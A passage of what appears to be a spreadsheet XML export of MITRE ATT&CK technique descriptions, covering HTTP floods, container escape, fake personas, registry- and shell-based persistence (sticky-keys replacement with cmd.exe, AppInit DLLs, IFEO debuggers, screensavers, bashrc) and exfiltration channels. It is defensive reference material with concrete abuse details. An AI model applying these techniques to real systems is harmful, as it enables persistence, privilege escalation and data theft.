One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)
Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)</t>
  </si>
  <si>
    <t>Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)
There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask)
Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open)
Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.</t>
  </si>
  <si>
    <t>Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
Creating [Cloud Accounts](https://attack.mitre.org/techniques/T1585/003) may also require adversaries to establish [Email Accounts](https://attack.mitre.org/techniques/T1585/002) to register with the cloud provider. </t>
  </si>
  <si>
    <t>Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)
To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)</t>
  </si>
  <si>
    <t>Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
For operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona  on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. 
Once a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.(Citation: Backdooring an AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)
Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)
Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. </t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
Two common accessibility programs are &lt;code&gt;C:\Windows\System32\sethc.exe&lt;/code&gt;, launched when the shift key is pressed five times and &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)
Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in &lt;code&gt;%systemdir%\&lt;/code&gt;, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.
For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)
* On-Screen Keyboard: &lt;code&gt;C:\Windows\System32\osk.exe&lt;/code&gt;
* Magnifier: &lt;code&gt;C:\Windows\System32\Magnify.exe&lt;/code&gt;
* Narrator: &lt;code&gt;C:\Windows\System32\Narrator.exe&lt;/code&gt;
* Display Switcher: &lt;code&gt;C:\Windows\System32\DisplaySwitch.exe&lt;/code&gt;
* App Switcher: &lt;code&gt;C:\Windows\System32\AtBroker.exe&lt;/code&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the &lt;code&gt;AppCertDLLs&lt;/code&gt; Registry key under &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\&lt;/code&gt; are loaded into every process that calls the ubiquitously used application programming interface (API) functions &lt;code&gt;CreateProcess&lt;/code&gt;, &lt;code&gt;CreateProcessAsUser&lt;/code&gt;, &lt;code&gt;CreateProcessWithLoginW&lt;/code&gt;, &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt;, or &lt;code&gt;WinExec&lt;/code&gt;. (Citation: Elastic Process Injection July 2017)
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity. </t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the &lt;code&gt;AppInit_DLLs&lt;/code&gt; value in the Registry keys &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; or &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017)
Similar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity. 
The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)
Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. 
A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:
* &lt;code&gt;%WINDIR%\AppPatch\sysmain.sdb&lt;/code&gt; and
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb&lt;/code&gt;
Custom databases are stored in:
* &lt;code&gt;%WINDIR%\AppPatch\custom &amp; %WINDIR%\AppPatch\AppPatch64\Custom&lt;/code&gt; and
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom&lt;/code&gt;
To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).
Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility.(Citation: Microsoft Change Default Programs)(Citation: Microsoft File Handlers)(Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
System file associations are listed under &lt;code&gt;HKEY_CLASSES_ROOT\.[extension]&lt;/code&gt;, for example &lt;code&gt;HKEY_CLASSES_ROOT\.txt&lt;/code&gt;. The entries point to a handler for that extension located at &lt;code&gt;HKEY_CLASSES_ROOT\\[handler]&lt;/code&gt;. The various commands are then listed as subkeys underneath the shell key at &lt;code&gt;HKEY_CLASSES_ROOT\\[handler]\shell\\[action]\command&lt;/code&gt;. For example: 
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\open\command&lt;/code&gt;
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\print\command&lt;/code&gt;
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\printto\command&lt;/code&gt;
The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands.(Citation: TrendMicro TROJ-FAKEAV OCT 2012)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model)  References to various COM objects are stored in the Registry. 
Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. </t>
  </si>
  <si>
    <t>Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at &lt;code&gt;/sbin/emond&lt;/code&gt; will load any rules from the &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; directory and take action once an explicitly defined event takes place.
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at&lt;code&gt;/System/Library/LaunchDaemons/com.apple.emond.plist&lt;/code&gt;.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., &lt;code&gt;C:\dbg\ntsd.exe -g  notepad.exe&lt;/code&gt;). (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as &lt;code&gt;Debugger&lt;/code&gt; values in the Registry under &lt;code&gt;HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;executable&gt;&lt;/code&gt; where &lt;code&gt;&amp;lt;executable&amp;gt;&lt;/code&gt; is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\&lt;/code&gt;. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.
Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle evilquest parti)
Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed.
For Windows, the Microsoft Installer services uses `.msi` files to manage the installing, updating, and uninstalling of applications. Adversaries have leveraged `Prebuild` and `Postbuild` events to run commands before or after a build when installing .msi files.(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts)</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt;.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)</t>
  </si>
  <si>
    <t>Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile  (&lt;code&gt;profile.ps1&lt;/code&gt;) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.
[PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles) 
Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script will be executed unless the &lt;code&gt;-NoProfile&lt;/code&gt; flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) 
An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in &lt;code&gt;C:\Windows\System32\&lt;/code&gt;, and &lt;code&gt;C:\Windows\sysWOW64\&lt;/code&gt;  on 64-bit Windows systems, along with screensavers included with base Windows installations.
The following screensaver settings are stored in the Registry (&lt;code&gt;HKCU\Control Panel\Desktop\&lt;/code&gt;) and could be manipulated to achieve persistence:
* &lt;code&gt;SCRNSAVE.exe&lt;/code&gt; - set to malicious PE path
* &lt;code&gt;ScreenSaveActive&lt;/code&gt; - set to '1' to enable the screensaver
* &lt;code&gt;ScreenSaverIsSecure&lt;/code&gt; - set to '0' to not require a password to unlock
* &lt;code&gt;ScreenSaveTimeout&lt;/code&gt; - sets user inactivity timeout before screensaver is executed
Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The &lt;code&gt;trap&lt;/code&gt; command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like &lt;code&gt;ctrl+c&lt;/code&gt; and &lt;code&gt;ctrl+d&lt;/code&gt;.
Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format &lt;code&gt;trap 'command list' signals&lt;/code&gt; where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)</t>
  </si>
  <si>
    <t>Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (&lt;code&gt;/etc&lt;/code&gt;) and the user’s home directory (&lt;code&gt;~/&lt;/code&gt;) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. 
Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the &lt;code&gt;/etc/profile&lt;/code&gt; and &lt;code&gt;/etc/profile.d&lt;/code&gt; files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into &lt;code&gt;~/.bash_profile&lt;/code&gt;, &lt;code&gt;~/.bash_login&lt;/code&gt;, or &lt;code&gt;~/.profile&lt;/code&gt; which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used &lt;code&gt;~/.bash_profile&lt;/code&gt; to ensure execution. Adversaries have also leveraged the &lt;code&gt;~/.bashrc&lt;/code&gt; file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the &lt;code&gt;~/.bash_logout&lt;/code&gt; file to execute malicious commands at the end of a session. 
For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using &lt;code&gt;/etc/profile&lt;/code&gt;, &lt;code&gt;/etc/zshenv&lt;/code&gt;, &lt;code&gt;/etc/zprofile&lt;/code&gt;, and &lt;code&gt;/etc/zlogin&lt;/code&gt;.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with &lt;code&gt;~/.zprofile&lt;/code&gt; and &lt;code&gt;~/.zlogin&lt;/code&gt;. The interactive shell uses the &lt;code&gt;~/.zshrc&lt;/code&gt; to configure the user environment. Upon exiting, &lt;code&gt;/etc/zlogout&lt;/code&gt; and &lt;code&gt;~/.zlogout&lt;/code&gt; are executed. For legacy programs, macOS executes &lt;code&gt;/etc/bashrc&lt;/code&gt; on startup.</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime.(Citation: Mandiant M-Trends 2015)
Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018)
WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.</t>
  </si>
  <si>
    <t>Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.</t>
  </si>
  <si>
    <t>Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)
Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.  
Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. 
